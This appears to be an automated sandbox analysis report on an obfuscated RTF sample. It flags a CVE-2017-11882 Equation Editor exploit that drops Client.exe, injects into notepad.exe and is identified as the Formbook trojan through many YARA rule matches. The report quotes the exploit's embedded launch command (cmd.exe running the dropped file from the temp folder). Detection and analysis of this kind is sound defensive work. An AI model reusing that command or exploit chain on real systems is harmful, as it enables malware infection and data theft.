          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binaries
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489049/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          PE file contains section with special chars
          Source: Client.exe.0.drStatic PE information: section name: 5++.8$
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          PE file has nameless sections
          Source: Client.exe.0.drStatic PE information: section name:
          Found suspicious RTF objects
          Source: Client.exeStatic RTF information: Object: 0 Offset: 000012A7h Client.exe
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003213386_2_00321338
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003236C06_2_003236C0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B616_2_00324B61
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003220786_2_00322078
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0032A1006_2_0032A100
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B706_2_00324B70
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00329BD86_2_00329BD8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004A79286_2_004A7928
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087BA286_2_0087BA28
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00870AAB6_2_00870AAB
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_008700486_2_00870048
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_008784786_2_00878478
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B1886_2_0087B188
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B5086_2_0087B508
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B3486_2_0087B348
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_024000486_2_02400048
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0B99_2_0041E0B9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D879_2_00402D87
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409E609_2_00409E60
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EE1B9_2_0041EE1B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041D6889_2_0041D688
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAE0C69_2_00AAE0C6
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ADD0059_2_00ADD005
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2D06D9_2_00B2D06D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB30409_2_00AB3040
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC905A9_2_00AC905A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAE2E99_2_00AAE2E9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B512389_2_00B51238
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B563BF9_2_00B563BF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAF3CF9_2_00AAF3CF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD63DB9_2_00AD63DB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB23059_2_00AB2305
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AFA37B9_2_00AFA37B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB73539_2_00AB7353
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC14899_2_00AC1489
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE54859_2_00AE5485
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3443E9_2_00B3443E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AED47D9_2_00AED47D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B305E39_2_00B305E3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ACC5F09_2_00ACC5F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB351F9_2_00AB351F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AF65409_2_00AF6540
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB46809_2_00AB4680
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABE6C19_2_00ABE6C1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B526229_2_00B52622
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AFA6349_2_00AFA634
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABC7BC9_2_00ABC7BC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3579A9_2_00B3579A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE57C39_2_00AE57C3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4F8EE9_2_00B4F8EE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2F8C49_2_00B2F8C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD286D9_2_00AD286D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABC85C9_2_00ABC85C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB29B29_2_00AB29B2
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5098E9_2_00B5098E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC69FE9_2_00AC69FE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B359559_2_00B35955
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3394B9_2_00B3394B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B63A839_2_00B63A83
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5CBA49_2_00B5CBA4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3DBDA9_2_00B3DBDA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD7B009_2_00AD7B00
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4FDDD9_2_00B4FDDD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE0D3B9_2_00AE0D3B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABCD5B9_2_00ABCD5B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE2E2F9_2_00AE2E2F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ACEE4C9_2_00ACEE4C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4CFB19_2_00B4CFB1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B22FDC9_2_00B22FDC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC0F3F9_2_00AC0F3F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ADDF7C9_2_00ADDF7C
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
